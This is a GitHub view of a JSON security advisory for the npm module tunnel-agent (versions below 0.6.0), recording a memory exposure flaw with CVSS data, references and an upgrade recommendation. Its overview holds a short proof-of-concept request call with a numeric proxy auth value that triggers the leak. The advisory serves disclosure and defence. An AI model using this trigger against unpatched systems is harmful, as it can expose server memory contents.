-
Notifications
You must be signed in to change notification settings - Fork 123
/
Copy path393.json
25 lines (25 loc) · 1.01 KB
/
393.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
{
"id": 393,
"title": "Memory Exposure",
"author": {
"name": "Сковорода Никита Андреевич",
"website": "https://github.com/ChALkeR",
"username": null
},
"module_name": "tunnel-agent",
"created_at": "2018-03-24",
"updated_at": "2018-03-24",
"publish_date": "2018-03-24",
"cves": [],
"vulnerable_versions": "<0.6.0",
"patched_versions": ">=0.6.0",
"overview": "PoC:\n```js\nrequire('request')({\n method: 'GET',\n uri: 'http://www.example.com',\n tunnel: true,\n proxy:{\n protocol: 'http:',\n host:'127.0.0.1',\n port:8080,\n auth:80 // number\n }\n});\n```\n\nReported at 2016-11-20.",
"recommendation": "update tunnel-agent to 0.6.0 or higher",
"references": [
"https://gist.github.com/ChALkeR/fd6b2c445834244e7d440a043f9d2ff4",
"https://github.com/request/tunnel-agent/commit/9ca95ec7219daface8a6fc2674000653de0922c0"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
"cvss_score": 6.5,
"coordinating_vendor": null
}